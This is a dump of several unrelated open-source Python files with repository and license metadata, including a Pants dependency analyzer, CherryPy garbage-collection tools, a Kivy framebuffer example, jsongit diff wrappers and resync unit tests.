shim_cc_basename = os.path.basename(large_pdb_shim_cc)
shim_cc_dir = vars['SHARED_INTERMEDIATE_DIR'] + '/' + copy_target_name
shim_cc_path = shim_cc_dir + '/' + shim_cc_basename
copy_dict = copy.deepcopy(base_dict)
copy_dict['target_name'] = copy_target_name
copy_dict['type'] = 'none'
copy_dict['sources'] = [ large_pdb_shim_cc ]
copy_dict['copies'] = [{
'destination': shim_cc_dir,
'files': [ large_pdb_shim_cc ]
}]
# This is the dict for the PDB generating shim target. It depends on the
# copy target.
shim_suffix = 'large_pdb_shim'
shim_target_name = target_name + '_' + shim_suffix
full_shim_target_name = _SuffixName(t, shim_suffix)
shim_dict = copy.deepcopy(base_dict)
shim_dict['target_name'] = shim_target_name
shim_dict['type'] = 'static_library'
shim_dict['sources'] = [ shim_cc_path ]
shim_dict['dependencies'] = [ full_copy_target_name ]
# Set up the shim to output its PDB to the same location as the final linker
# target.
for config_name, config in shim_dict.get('configurations').iteritems():
pdb_path = _GetPdbPath(target_dict, config_name, vars)
# A few keys that we don't want to propagate.
for key in ['msvs_precompiled_header', 'msvs_precompiled_source', 'test']:
config.pop(key, None)
msvs = config.setdefault('msvs_settings', {})
# Update the compiler directives in the shim target.
compiler = msvs.setdefault('VCCLCompilerTool', {})
compiler['DebugInformationFormat'] = '3'
compiler['ProgramDataBaseFileName'] = pdb_path
# Set the explicit PDB path in the appropriate configuration of the
# original target.
config = target_dict['configurations'][config_name]
msvs = config.setdefault('msvs_settings', {})
linker = msvs.setdefault('VCLinkerTool', {})
linker['GenerateDebugInformation'] = 'true'
linker['ProgramDatabaseFile'] = pdb_path
# Add the new targets. They must go to the beginning of the list so that
# the dependency generation works as expected in ninja.
target_list.insert(0, full_copy_target_name)
target_list.insert(0, full_shim_target_name)
target_dicts[full_copy_target_name] = copy_dict
target_dicts[full_shim_target_name] = shim_dict
# Update the original target to depend on the shim target.
target_dict.setdefault('dependencies', []).append(full_shim_target_name)
return (target_list, target_dicts) | gpl-2.0 |
wenqvip/pytuto | proj3/pagemaker.py | 1 | 1061 | __author__ = 'Spencer'
from xml.sax.handler import ContentHandler
from xml.sax import parse
class PageMaker(ContentHandler):
passthrough = False
def startElement(self, name, attrs):
if name == 'page':
self.passthrough = True
self.out = open(attrs['name'] + '.html', 'w')
self.out.write('<html><head>\n')
self.out.write('<title>%s</title>\n' % attrs['title'])
self.out.write('</head><body>\n')
elif self.passthrough:
self.out.write('<' + name)
for key, val in attrs.items():
self.out.write(' %s="%s"' % (key, val))
self.out.write('>')
def endElement(self, name):
if name == 'page':
self.passthrough = False
self.out.write('\n</body></html>\n')
self.out.close()
elif self.passthrough:
self.out.write('</%s>' % name)
def characters(self, content):
if self.passthrough:
self.out.write(content)
parse('website.xml', PageMaker()) | gpl-3.0 |
areitz/pants | src/python/pants/backend/jvm/tasks/jvm_compile/jvm_dependency_analyzer.py | 4 | 13065 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from collections import defaultdict
from twitter.common.collections import OrderedSet
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.jvm_target import JvmTarget
from pants.backend.jvm.targets.scala_library import ScalaLibrary
from pants.backend.jvm.tasks.ivy_task_mixin import IvyTaskMixin
from pants.base.build_environment import get_buildroot
from pants.base.build_graph import sort_targets
from pants.base.exceptions import TaskError
class JvmDependencyAnalyzer(object):
def __init__(self,
context,
check_missing_deps,
check_missing_direct_deps,
check_unnecessary_deps,
target_whitelist):
self._context = context
self._check_missing_deps = check_missing_deps
self._check_missing_direct_deps = check_missing_direct_deps
self._check_unnecessary_deps = check_unnecessary_deps
# These targets we will not report as having any dependency issues even if they do.
self._target_whitelist = OrderedSet(target_whitelist)
@classmethod
def prepare(cls, options, round_manager):
round_manager.require_data('ivy_jar_products')
round_manager.require_data('ivy_resolve_symlink_map')
def _compute_targets_by_file(self):
"""Returns a map from abs path of source, class or jar file to an OrderedSet of targets.
The value is usually a singleton, because a source or class file belongs to a single target.
However a single jar may be provided (transitively or intransitively) by multiple JarLibrary
targets. But if there is a JarLibrary target that depends on a jar directly, then that
"canonical" target will be the first one in the list of targets.
"""
targets_by_file = defaultdict(OrderedSet)
# Multiple JarLibrary targets can provide the same (org, name).
jarlibs_by_id = defaultdict(set)
# Compute src -> target.
with self._context.new_workunit(name='map_sources'):
buildroot = get_buildroot()
# Look at all targets in-play for this pants run. Does not include synthetic targets,
for target in self._context.targets():
if isinstance(target, JvmTarget):
for src in target.sources_relative_to_buildroot():
targets_by_file[os.path.join(buildroot, src)].add(target)
elif isinstance(target, JarLibrary):
for jardep in target.jar_dependencies:
jarlibs_by_id[(jardep.org, jardep.name)].add(target)
# TODO(Tejal Desai): pantsbuild/pants/65: Remove java_sources attribute for ScalaLibrary
if isinstance(target, ScalaLibrary):
for java_source in target.java_sources:
for src in java_source.sources_relative_to_buildroot():
targets_by_file[os.path.join(buildroot, src)].add(target)
# Compute class -> target.
with self._context.new_workunit(name='map_classes'):
classes_by_target = self._context.products.get_data('classes_by_target')
for tgt, target_products in classes_by_target.items():
for _, classes in target_products.abs_paths():
for cls in classes:
targets_by_file[cls].add(tgt)
# Compute jar -> target.
with self._context.new_workunit(name='map_jars'):
with IvyTaskMixin.symlink_map_lock:
all_symlinks_map = self._context.products.get_data('ivy_resolve_symlink_map').copy()
# We make a copy, so it's safe to use outside the lock.
def register_transitive_jars_for_ref(ivyinfo, ref):
deps_by_ref_memo = {}
def get_transitive_jars_by_ref(ref1):
def create_collection(current_ref):
return {ivyinfo.modules_by_ref[current_ref].artifact}
return ivyinfo.traverse_dependency_graph(ref1, create_collection, memo=deps_by_ref_memo)
target_key = (ref.org, ref.name)
if target_key in jarlibs_by_id:
# These targets provide all the jars in ref, and all the jars ref transitively depends on.
jarlib_targets = jarlibs_by_id[target_key]
for jar_path in get_transitive_jars_by_ref(ref):
# Register that each jarlib_target provides jar (via all its symlinks).
symlink = all_symlinks_map.get(os.path.realpath(jar_path), None)
if symlink:
for jarlib_target in jarlib_targets:
targets_by_file[symlink].add(jarlib_target)
ivy_products = self._context.products.get_data('ivy_jar_products')
if ivy_products:
for ivyinfos in ivy_products.values():
for ivyinfo in ivyinfos:
for ref in ivyinfo.modules_by_ref:
register_transitive_jars_for_ref(ivyinfo, ref)
return targets_by_file
def _compute_transitive_deps_by_target(self):
"""Map from target to all the targets it depends on, transitively."""
# Sort from least to most dependent.
sorted_targets = reversed(sort_targets(self._context.targets()))
transitive_deps_by_target = defaultdict(set)
# Iterate in dep order, to accumulate the transitive deps for each target.
for target in sorted_targets:
transitive_deps = set()
for dep in target.dependencies:
transitive_deps.update(transitive_deps_by_target.get(dep, []))
transitive_deps.add(dep)
# Need to handle the case where a java_sources target has dependencies.
# In particular if it depends back on the original target.
if hasattr(target, 'java_sources'):
for java_source_target in target.java_sources:
for transitive_dep in java_source_target.dependencies:
transitive_deps_by_target[java_source_target].add(transitive_dep)
transitive_deps_by_target[target] = transitive_deps
return transitive_deps_by_target
def check(self, srcs, actual_deps):
"""Check for missing deps.
See docstring for _compute_missing_deps for details.
"""
if self._check_missing_deps or self._check_missing_direct_deps or self._check_unnecessary_deps:
missing_file_deps, missing_tgt_deps, missing_direct_tgt_deps = \
self._compute_missing_deps(srcs, actual_deps)
buildroot = get_buildroot()
def shorten(path): # Make the output easier to read.
if path.startswith(buildroot):
return os.path.relpath(path, buildroot)
return path
def filter_whitelisted(missing_deps):
        # Remove any targets that exist in the whitelist from the list of dependency issues.
return [(tgt_pair, evidence) for (tgt_pair, evidence) in missing_deps
if tgt_pair[0].address.reference() not in self._target_whitelist]
missing_tgt_deps = filter_whitelisted(missing_tgt_deps)
if self._check_missing_deps and (missing_file_deps or missing_tgt_deps):
for (tgt_pair, evidence) in missing_tgt_deps:
evidence_str = '\n'.join([' {} uses {}'.format(shorten(e[0]), shorten(e[1]))
for e in evidence])
self._context.log.error(
'Missing BUILD dependency {} -> {} because:\n{}'
.format(tgt_pair[0].address.reference(), tgt_pair[1].address.reference(), evidence_str))
for (src_tgt, dep) in missing_file_deps:
self._context.log.error('Missing BUILD dependency {} -> {}'
.format(src_tgt.address.reference(), shorten(dep)))
if self._check_missing_deps == 'fatal':
raise TaskError('Missing deps.')
missing_direct_tgt_deps = filter_whitelisted(missing_direct_tgt_deps)
if self._check_missing_direct_deps and missing_direct_tgt_deps:
for (tgt_pair, evidence) in missing_direct_tgt_deps:
evidence_str = '\n'.join([' {} uses {}'.format(shorten(e[0]), shorten(e[1]))
for e in evidence])
self._context.log.warn('Missing direct BUILD dependency {} -> {} because:\n{}'
.format(tgt_pair[0].address, tgt_pair[1].address, evidence_str))
if self._check_missing_direct_deps == 'fatal':
raise TaskError('Missing direct deps.')
if self._check_unnecessary_deps:
raise TaskError('Unnecessary dep warnings not implemented yet.')
def _compute_missing_deps(self, srcs, actual_deps):
"""Computes deps that are used by the compiler but not specified in a BUILD file.
These deps are bugs waiting to happen: the code may happen to compile because the dep was
brought in some other way (e.g., by some other root target), but that is obviously fragile.
Note that in practice we're OK with reliance on indirect deps that are only brought in
    transitively. E.g., in Scala, type inference can bring in such a dep subtly. Fortunately these
cases aren't as fragile as a completely missing dependency. It's still a good idea to have
explicit direct deps where relevant, so we optionally warn about indirect deps, to make them
easy to find and reason about.
- actual_deps: a map src -> list of actual deps (source, class or jar file) as noted by the
compiler.
Returns a triple (missing_file_deps, missing_tgt_deps, missing_direct_tgt_deps) where:
- missing_file_deps: a list of pairs (src_tgt, dep_file) where src_tgt requires dep_file, and
we're unable to map to a target (because its target isn't in the total set of targets in play,
and we don't want to parse every BUILD file in the workspace just to find it).
- missing_tgt_deps: a list of pairs (src_tgt, dep_tgt) where src_tgt is missing a necessary
transitive dependency on dep_tgt.
- missing_direct_tgt_deps: a list of pairs (src_tgt, dep_tgt) where src_tgt is missing a direct
dependency on dep_tgt but has a transitive dep on it.
All paths in the input and output are absolute.
"""
def must_be_explicit_dep(dep):
# We don't require explicit deps on the java runtime, so we shouldn't consider that
# a missing dep.
return not dep.startswith(self._context.java_home)
def target_or_java_dep_in_targets(target, targets):
# We want to check if the target is in the targets collection
#
# However, for the special case of scala_library that has a java_sources
# reference we're ok if that exists in targets even if the scala_library does not.
if target in targets:
return True
elif target.is_scala:
return any(t in targets for t in target.java_sources)
else:
return False
# TODO: If recomputing these every time becomes a performance issue, memoize for
# already-seen targets and incrementally compute for new targets not seen in a previous
# partition, in this or a previous chunk.
targets_by_file = self._compute_targets_by_file()
transitive_deps_by_target = self._compute_transitive_deps_by_target()
# Find deps that are actual but not specified.
with self._context.new_workunit(name='scan_deps'):
      missing_file_deps = OrderedSet()  # (src tgt, dep file) pairs.
missing_tgt_deps_map = defaultdict(list) # (tgt, tgt) -> a list of (src, src) as evidence.
missing_direct_tgt_deps_map = defaultdict(list) # The same, but for direct deps.
buildroot = get_buildroot()
abs_srcs = [os.path.join(buildroot, src) for src in srcs]
for src in abs_srcs:
        src_tgt = next(iter(targets_by_file.get(src, [])), None)
if src_tgt is not None:
for actual_dep in filter(must_be_explicit_dep, actual_deps.get(src, [])):
actual_dep_tgts = targets_by_file.get(actual_dep)
# actual_dep_tgts is usually a singleton. If it's not, we only need one of these
# to be in our declared deps to be OK.
if actual_dep_tgts is None:
missing_file_deps.add((src_tgt, actual_dep))
elif not target_or_java_dep_in_targets(src_tgt, actual_dep_tgts):
# Obviously intra-target deps are fine.
canonical_actual_dep_tgt = next(iter(actual_dep_tgts))
if actual_dep_tgts.isdisjoint(transitive_deps_by_target.get(src_tgt, [])):
missing_tgt_deps_map[(src_tgt, canonical_actual_dep_tgt)].append((src, actual_dep))
elif canonical_actual_dep_tgt not in src_tgt.dependencies:
# The canonical dep is the only one a direct dependency makes sense on.
missing_direct_tgt_deps_map[(src_tgt, canonical_actual_dep_tgt)].append(
(src, actual_dep))
else:
raise TaskError('Requested dep info for unknown source file: {}'.format(src))
return (list(missing_file_deps),
missing_tgt_deps_map.items(),
missing_direct_tgt_deps_map.items())
| apache-2.0 |
CuriousLearner/kivy | examples/canvas/fbo_canvas.py | 59 | 2544 | '''
FBO Canvas
==========
This demonstrates a layout using an FBO (Framebuffer Object)
instead of a plain canvas. You should see a black canvas with a
button labelled 'FBO' in the bottom left corner. Clicking it
animates the button back and forth across the bottom of the layout.
'''
__all__ = ('FboFloatLayout', )
from kivy.graphics import Color, Rectangle, Canvas, ClearBuffers, ClearColor
from kivy.graphics.fbo import Fbo
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import ObjectProperty, NumericProperty
from kivy.app import App
from kivy.core.window import Window
from kivy.animation import Animation
from kivy.factory import Factory
class FboFloatLayout(FloatLayout):
texture = ObjectProperty(None, allownone=True)
alpha = NumericProperty(1)
def __init__(self, **kwargs):
self.canvas = Canvas()
with self.canvas:
self.fbo = Fbo(size=self.size)
self.fbo_color = Color(1, 1, 1, 1)
self.fbo_rect = Rectangle()
with self.fbo:
ClearColor(0, 0, 0, 0)
ClearBuffers()
        # wait until all the instructions are in the canvas before setting the texture
self.texture = self.fbo.texture
super(FboFloatLayout, self).__init__(**kwargs)
def add_widget(self, *largs):
# trick to attach graphics instruction to fbo instead of canvas
canvas = self.canvas
self.canvas = self.fbo
ret = super(FboFloatLayout, self).add_widget(*largs)
self.canvas = canvas
return ret
def remove_widget(self, *largs):
canvas = self.canvas
self.canvas = self.fbo
super(FboFloatLayout, self).remove_widget(*largs)
self.canvas = canvas
def on_size(self, instance, value):
self.fbo.size = value
self.texture = self.fbo.texture
self.fbo_rect.size = value
def on_pos(self, instance, value):
self.fbo_rect.pos = value
def on_texture(self, instance, value):
self.fbo_rect.texture = value
def on_alpha(self, instance, value):
self.fbo_color.rgba = (1, 1, 1, value)
class ScreenLayerApp(App):
def build(self):
f = FboFloatLayout()
b = Factory.Button(text="FBO", size_hint=(None, None))
f.add_widget(b)
def anim_btn(*args):
if b.pos[0] == 0:
Animation(x=f.width - b.width).start(b)
else:
Animation(x=0).start(b)
b.bind(on_press=anim_btn)
return f
if __name__ == "__main__":
ScreenLayerApp().run()
| mit |
pgiraud/georchestra | extractorapp/jsbuild/util/gen-go-jstools.py | 24 | 1441 | #!/usr/bin/env python
"""Generate go-jstools.py"""
import sys
import textwrap
import virtualenv
filename = 'go-jstools.py'
after_install = """\
import os, subprocess
def after_install(options, home_dir):
etc = join(home_dir, 'etc')
## TODO: this should all come from distutils
## like distutils.sysconfig.get_python_inc()
if sys.platform == 'win32':
lib_dir = join(home_dir, 'Lib')
bin_dir = join(home_dir, 'Scripts')
elif is_jython:
lib_dir = join(home_dir, 'Lib')
bin_dir = join(home_dir, 'bin')
else:
lib_dir = join(home_dir, 'lib', py_version)
bin_dir = join(home_dir, 'bin')
if not os.path.exists(etc):
os.makedirs(etc)
subprocess.call([join(bin_dir, 'easy_install'), 'JSTools==%s'])
"""
def generate(filename, version):
# what's commented out below comes from go-pylons.py
#path = version
#if '==' in version:
# path = version[:version.find('==')]
#output = virtualenv.create_bootstrap_script(
# textwrap.dedent(after_install % (path, version)))
output = virtualenv.create_bootstrap_script(
textwrap.dedent(after_install % version))
fp = open(filename, 'w')
fp.write(output)
fp.close()
def main():
if len(sys.argv) != 2:
print >> sys.stderr, 'usage: %s version' % sys.argv[0]
sys.exit(1)
generate(filename, sys.argv[1])
if __name__ == '__main__':
main()
| gpl-3.0 |
boompieman/iim_project | project_python2/lib/python2.7/site-packages/pattern/server/cherrypy/cherrypy/lib/gctools.py | 40 | 7396 | import gc
import inspect
import os
import sys
import time
try:
import objgraph
except ImportError:
objgraph = None
import cherrypy
from cherrypy import _cprequest, _cpwsgi
from cherrypy.process.plugins import SimplePlugin
class ReferrerTree(object):
"""An object which gathers all referrers of an object to a given depth."""
peek_length = 40
def __init__(self, ignore=None, maxdepth=2, maxparents=10):
self.ignore = ignore or []
self.ignore.append(inspect.currentframe().f_back)
self.maxdepth = maxdepth
self.maxparents = maxparents
def ascend(self, obj, depth=1):
"""Return a nested list containing referrers of the given object."""
depth += 1
parents = []
# Gather all referrers in one step to minimize
# cascading references due to repr() logic.
refs = gc.get_referrers(obj)
self.ignore.append(refs)
if len(refs) > self.maxparents:
return [("[%s referrers]" % len(refs), [])]
try:
ascendcode = self.ascend.__code__
except AttributeError:
ascendcode = self.ascend.im_func.func_code
for parent in refs:
if inspect.isframe(parent) and parent.f_code is ascendcode:
continue
if parent in self.ignore:
continue
if depth <= self.maxdepth:
parents.append((parent, self.ascend(parent, depth)))
else:
parents.append((parent, []))
return parents
def peek(self, s):
"""Return s, restricted to a sane length."""
if len(s) > (self.peek_length + 3):
half = self.peek_length // 2
return s[:half] + '...' + s[-half:]
else:
return s
def _format(self, obj, descend=True):
"""Return a string representation of a single object."""
if inspect.isframe(obj):
filename, lineno, func, context, index = inspect.getframeinfo(obj)
return "<frame of function '%s'>" % func
if not descend:
return self.peek(repr(obj))
if isinstance(obj, dict):
return "{" + ", ".join(["%s: %s" % (self._format(k, descend=False),
self._format(v, descend=False))
for k, v in obj.items()]) + "}"
elif isinstance(obj, list):
return "[" + ", ".join([self._format(item, descend=False)
for item in obj]) + "]"
elif isinstance(obj, tuple):
return "(" + ", ".join([self._format(item, descend=False)
for item in obj]) + ")"
r = self.peek(repr(obj))
if isinstance(obj, (str, int, float)):
return r
return "%s: %s" % (type(obj), r)
def format(self, tree):
"""Return a list of string reprs from a nested list of referrers."""
output = []
def ascend(branch, depth=1):
for parent, grandparents in branch:
output.append((" " * depth) + self._format(parent))
if grandparents:
ascend(grandparents, depth + 1)
ascend(tree)
return output
def get_instances(cls):
return [x for x in gc.get_objects() if isinstance(x, cls)]
class RequestCounter(SimplePlugin):
def start(self):
self.count = 0
def before_request(self):
self.count += 1
def after_request(self):
        self.count -= 1
request_counter = RequestCounter(cherrypy.engine)
request_counter.subscribe()
def get_context(obj):
if isinstance(obj, _cprequest.Request):
return "path=%s;stage=%s" % (obj.path_info, obj.stage)
elif isinstance(obj, _cprequest.Response):
return "status=%s" % obj.status
elif isinstance(obj, _cpwsgi.AppResponse):
return "PATH_INFO=%s" % obj.environ.get('PATH_INFO', '')
elif hasattr(obj, "tb_lineno"):
return "tb_lineno=%s" % obj.tb_lineno
return ""
class GCRoot(object):
"""A CherryPy page handler for testing reference leaks."""
classes = [(_cprequest.Request, 2, 2,
"Should be 1 in this request thread and 1 in the main thread."),
(_cprequest.Response, 2, 2,
"Should be 1 in this request thread and 1 in the main thread."),
(_cpwsgi.AppResponse, 1, 1,
"Should be 1 in this request thread only."),
]
def index(self):
return "Hello, world!"
index.exposed = True
def stats(self):
output = ["Statistics:"]
for trial in range(10):
if request_counter.count > 0:
break
time.sleep(0.5)
else:
output.append("\nNot all requests closed properly.")
# gc_collect isn't perfectly synchronous, because it may
# break reference cycles that then take time to fully
# finalize. Call it thrice and hope for the best.
gc.collect()
gc.collect()
unreachable = gc.collect()
if unreachable:
if objgraph is not None:
final = objgraph.by_type('Nondestructible')
if final:
objgraph.show_backrefs(final, filename='finalizers.png')
trash = {}
for x in gc.garbage:
trash[type(x)] = trash.get(type(x), 0) + 1
if trash:
output.insert(0, "\n%s unreachable objects:" % unreachable)
trash = [(v, k) for k, v in trash.items()]
trash.sort()
for pair in trash:
output.append(" " + repr(pair))
# Check declared classes to verify uncollected instances.
# These don't have to be part of a cycle; they can be
# any objects that have unanticipated referrers that keep
# them from being collected.
allobjs = {}
for cls, minobj, maxobj, msg in self.classes:
allobjs[cls] = get_instances(cls)
for cls, minobj, maxobj, msg in self.classes:
objs = allobjs[cls]
lenobj = len(objs)
if lenobj < minobj or lenobj > maxobj:
if minobj == maxobj:
output.append(
"\nExpected %s %r references, got %s." %
(minobj, cls, lenobj))
else:
output.append(
"\nExpected %s to %s %r references, got %s." %
(minobj, maxobj, cls, lenobj))
for obj in objs:
if objgraph is not None:
ig = [id(objs), id(inspect.currentframe())]
fname = "graph_%s_%s.png" % (cls.__name__, id(obj))
objgraph.show_backrefs(
obj, extra_ignore=ig, max_depth=4, too_many=20,
filename=fname, extra_info=get_context)
output.append("\nReferrers for %s (refcount=%s):" %
(repr(obj), sys.getrefcount(obj)))
t = ReferrerTree(ignore=[objs], maxdepth=3)
tree = t.ascend(obj)
output.extend(t.format(tree))
return "\n".join(output)
stats.exposed = True
| gpl-3.0 |
mohitsethi/packstack | packstack/installer/exceptions.py | 13 | 1622 | # -*- coding: utf-8 -*-
__all__ = (
'PackStackError',
'InstallError',
'FlagValidationError',
'MissingRequirements',
'PluginError',
'ParamProcessingError',
'ParamValidationError',
'NetworkError',
'ScriptRuntimeError',
)
class PackStackError(Exception):
"""Default Exception class for packstack installer."""
def __init__(self, *args, **kwargs):
super(PackStackError, self).__init__(*args)
self.stdout = kwargs.get('stdout', None)
self.stderr = kwargs.get('stderr', None)
class PuppetError(Exception):
"""Raised when Puppet will have some problems."""
class MissingRequirements(PackStackError):
"""Raised when minimum install requirements are not met."""
pass
class InstallError(PackStackError):
"""Exception for generic errors during setup run."""
pass
class FlagValidationError(InstallError):
"""Raised when single flag validation fails."""
pass
class ParamValidationError(InstallError):
"""Raised when parameter value validation fails."""
pass
class PluginError(PackStackError):
pass
class ParamProcessingError(PluginError):
pass
class NetworkError(PackStackError):
"""Should be used for packstack's network failures."""
pass
class ScriptRuntimeError(PackStackError):
"""
Raised when utils.ScriptRunner.execute does not end successfully.
"""
pass
class ExecuteRuntimeError(PackStackError):
"""Raised when utils.execute does not end successfully."""
class SequenceError(PackStackError):
"""Exception for errors during setup sequence run."""
pass
| apache-2.0 |
texcaltech/windmilltownhomes-old | django/core/mail/backends/base.py | 660 | 1164 | """Base email backend class."""
class BaseEmailBackend(object):
"""
Base class for email backend implementations.
Subclasses must at least overwrite send_messages().
"""
def __init__(self, fail_silently=False, **kwargs):
self.fail_silently = fail_silently
def open(self):
"""Open a network connection.
This method can be overwritten by backend implementations to
open a network connection.
It's up to the backend implementation to track the status of
a network connection if it's needed by the backend.
This method can be called by applications to force a single
network connection to be used when sending mails. See the
send_messages() method of the SMTP backend for a reference
implementation.
The default implementation does nothing.
"""
pass
def close(self):
"""Close a network connection."""
pass
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
raise NotImplementedError
| bsd-3-clause |
talos/jsongit | jsongit/wrappers.py | 1 | 9151 | # -*- coding: utf-8 -*-
"""
jsongit.wrappers
These classes provide limited interfaces to pygit2 and json_diff constructs.
"""
import json_diff
import itertools
import copy
class Commit(object):
"""A wrapper around :class:`pygit2.Commit` linking to a single key in the
repo.
"""
def __init__(self, repo, key, data, pygit2_commit):
self._commit = pygit2_commit
self._repo = repo
self._key = key
self._data = data
def __eq__(self, other):
return self.oid == other.oid
def __str__(self):
return "'%s'='%s'@%s" % (self.key, self.data, self.hex[0:10])
def __repr__(self):
return "%s(%s,message=%s,author=%s)" % (type(self).__name__,
self.__str__(), self.message,
self.author)
@property
def data(self):
"""
:returns: the data associated with this commit.
:rtype: Boolean, Number, None, String, Dict, or List
"""
return self._data
@property
def key(self):
"""
:returns: the key associated with this commit.
:rtype: string
"""
return self._key
@property
def oid(self):
"""
:returns: The unique 20-byte ID of this Commit.
:rtype: string
"""
return self._commit.oid
@property
def hex(self):
"""
:returns: The unique 40-character hex representation of this commit's ID.
:rtype: string
"""
return self._commit.hex
@property
def message(self):
"""
:returns: The message associated with this commit.
:rtype: string
"""
return self._commit.message
@property
def author(self):
"""
:returns: The author of this commit.
:rtype: :class:`pygit2.Signature`
"""
return self._commit.author
@property
def committer(self):
"""
:returns: The committer of this commit.
:rtype: :class:`pygit2.Signature`
"""
return self._commit.committer
@property
def time(self):
"""
:returns: The time of this commit.
:rtype: long
"""
return self._commit.commit_time
@property
def repo(self):
"""
:returns: The repository of this commit.
:rtype: :class:`Repository <jsongit.models.Repository>`
"""
return self._repo
class DiffWrapper(object):
"""An internal wrapper for :mod:`json_diff`.
"""
def __init__(self, diff):
if Diff.is_json_diff(diff):
# wrap recursive updates
if Diff.UPDATE in diff:
update = diff[Diff.UPDATE]
for k, v in update.iteritems():
update[k] = DiffWrapper(v)
self._replace = None
else:
self._replace = diff
diff = {} if diff is None else diff
self._diff = diff
def __str__(self):
return self._diff.__str__()
def __repr__(self):
return "%s(%s)" % (type(self).__name__, self._diff.__repr__())
def __getitem__(self, k):
return self._diff[k]
def __eq__(self, other):
return self._diff == other
@property
def remove(self):
"""A dict of removed keys and their values.
"""
return self._diff.get(Diff.REMOVE)
@property
def update(self):
"""A DiffWrapper
"""
return self._diff.get(Diff.UPDATE)
@property
def append(self):
"""A dict of appended keys and their values.
"""
return self._diff.get(Diff.APPEND)
@property
def replace(self):
"""The diff is simply to replace wholesale.
"""
return self._replace
def apply(self, original):
"""Return an object modified with the changes in this diff.
:param original: the object to apply the diff to.
:type original: list, dict, number, or string
:returns: the modified object
:rtype: list, dict, number, or string
"""
if self.replace:
return self.replace
else:
obj = copy.copy(original)
for k, v in (self.remove or {}).iteritems():
obj.pop(k)
for k, v in (self.update or {}).iteritems():
# Recursive application
obj[k] = v.apply(obj[k])
for k, v in (self.append or {}).iteritems():
if hasattr(obj, 'insert'):
obj.insert(k, v)
else:
obj[k] = v
return obj
class Diff(DiffWrapper):
"""A class to encapsulate differences between two JSON git objects.
"""
APPEND = '_append'
REMOVE = '_remove'
UPDATE = '_update'
@classmethod
def is_json_diff(cls, obj):
"""Determine whether a dict was produced by JSON diff.
"""
if isinstance(obj, dict):
return any(k in obj for k in [cls.APPEND, cls.REMOVE, cls.UPDATE])
else:
return False
def __init__(self, obj1, obj2):
if isinstance(obj2, obj1.__class__):
c = json_diff.Comparator()
c.obj1 = obj1
c.obj2 = obj2
diff = c._compare_elements(obj1, obj2)
super(Diff, self).__init__(diff)
else:
# if types differ we just replace
super(Diff, self).__init__(obj2)
class Conflict(object):
"""A class wrapper for the conflict between two diffs.
"""
def __init__(self, diff1, diff2):
self._conflict = {}
if diff1.replace or diff2.replace:
if diff1.replace != diff2.replace:
self._conflict = {'replace': (diff1.replace, diff2.replace)}
else:
for verb1, verb2 in itertools.product(['append', 'update', 'remove'],
repeat=2):
mod1 = getattr(diff1, verb1) or {}
mod2 = getattr(diff2, verb2) or {}
                # Isolate simultaneously modified keys
                for k in (k for k in mod1 if k in mod2):
                    # If the verbs were the same, it's OK unless the mods differed.
                    if verb1 == verb2:
                        if mod1[k] != mod2[k]:
                            self._conflict.setdefault(verb1, {})[k] = (mod1[k], mod2[k])
                    # Different verbs on the same key always conflict.
                    else:
                        self._conflict.setdefault(verb1, {})[k] = (mod1[k], None)
                        self._conflict.setdefault(verb2, {})[k] = (None, mod2[k])
def __nonzero__(self):
return len(self._conflict) != 0
def __str__(self):
return self._conflict.__str__()
def __repr__(self):
return "%s(%s)" % (type(self).__name__, self._conflict.__repr__())
@property
def remove(self):
"""A dict of key removal conflict tuples.
"""
return self._conflict.get('remove')
@property
def update(self):
"""A dict of key update conflict tuples.
"""
return self._conflict.get('update')
@property
def append(self):
"""A dict of key append conflict tuples.
"""
return self._conflict.get('append')
@property
def replace(self):
"""A tuple of the two diffs.
"""
return self._conflict.get('replace')
class Merge(object):
"""A class wrapper for the results of a merge operation.
"""
def __init__(self, success, original, merged, message, result=None,
conflict=None):
self._success = success
self._message = message
self._original = original
self._merged = merged
self._conflict = conflict
self._result = result
def __str__(self):
return self.message
def __repr__(self):
return "%s(success=%s,message=%s,conflict=%s,original=%s,merged=%s)" % (
type(self).__name__, self.success, self.message, self.conflict,
self.original, self.merged)
def __nonzero__(self):
return self.success
@property
def result(self):
"""
:returns:
the object resulting from this merge, or None if there was
a conflict.
"""
return self._result
@property
def success(self):
"""Whether the merge was a success.
"""
return self._success
@property
def original(self):
"""The original object.
"""
return self._original
@property
def merged(self):
"""The object that was merged in.
"""
return self._merged
@property
def conflict(self):
"""The :class:`Conflict <jsongit.wrappers.Conflict>`, if the merge
was not a success.
"""
return self._conflict
@property
def message(self):
"""The message associated with this merge.
"""
return self._message
| bsd-3-clause |
lindareijnhoudt/resync | resync/test/test_client_utils.py | 2 | 2589 | import unittest
from resync.client_utils import count_true_args,parse_links,parse_link,parse_capabilities,parse_capability_lists
from resync.client import ClientFatalError
class TestClientUtils(unittest.TestCase):
def test01_count_true_args(self):
self.assertEqual( count_true_args(), 0 )
self.assertEqual( count_true_args(True), 1 )
self.assertEqual( count_true_args(False), 0 )
self.assertEqual( count_true_args(0,1,2,3), 3 )
def test02_parse_links(self):
self.assertEqual( parse_links( [] ), [] )
self.assertEqual( parse_links( ['u,h'] ), [{'href': 'h', 'rel': 'u'}] )
self.assertEqual( parse_links( ['u,h','v,i'] ), [{'href': 'h', 'rel': 'u'},{'href': 'i', 'rel': 'v'}] )
self.assertRaises( ClientFatalError, parse_links, 'xx' )
self.assertRaises( ClientFatalError, parse_links, ['u'] )
self.assertRaises( ClientFatalError, parse_links, ['u,h','u'] )
def test03_parse_link(self):
# Input string of the form: rel,href,att1=val1,att2=val2
self.assertEqual( parse_link('u,h'), {'href': 'h', 'rel': 'u'} )
self.assertEqual( parse_link('u,h,a=b'), {'a': 'b', 'href': 'h', 'rel': 'u'} )
self.assertEqual( parse_link('u,h,a=b,c=d'), {'a': 'b', 'c': 'd', 'href': 'h', 'rel': 'u'} )
self.assertEqual( parse_link('u,h,a=b,a=d'), {'a': 'd', 'href': 'h', 'rel': 'u'} ) # desired??
self.assertRaises( ClientFatalError, parse_link, '' )
self.assertRaises( ClientFatalError, parse_link, 'u' )
self.assertRaises( ClientFatalError, parse_link, 'u,' )
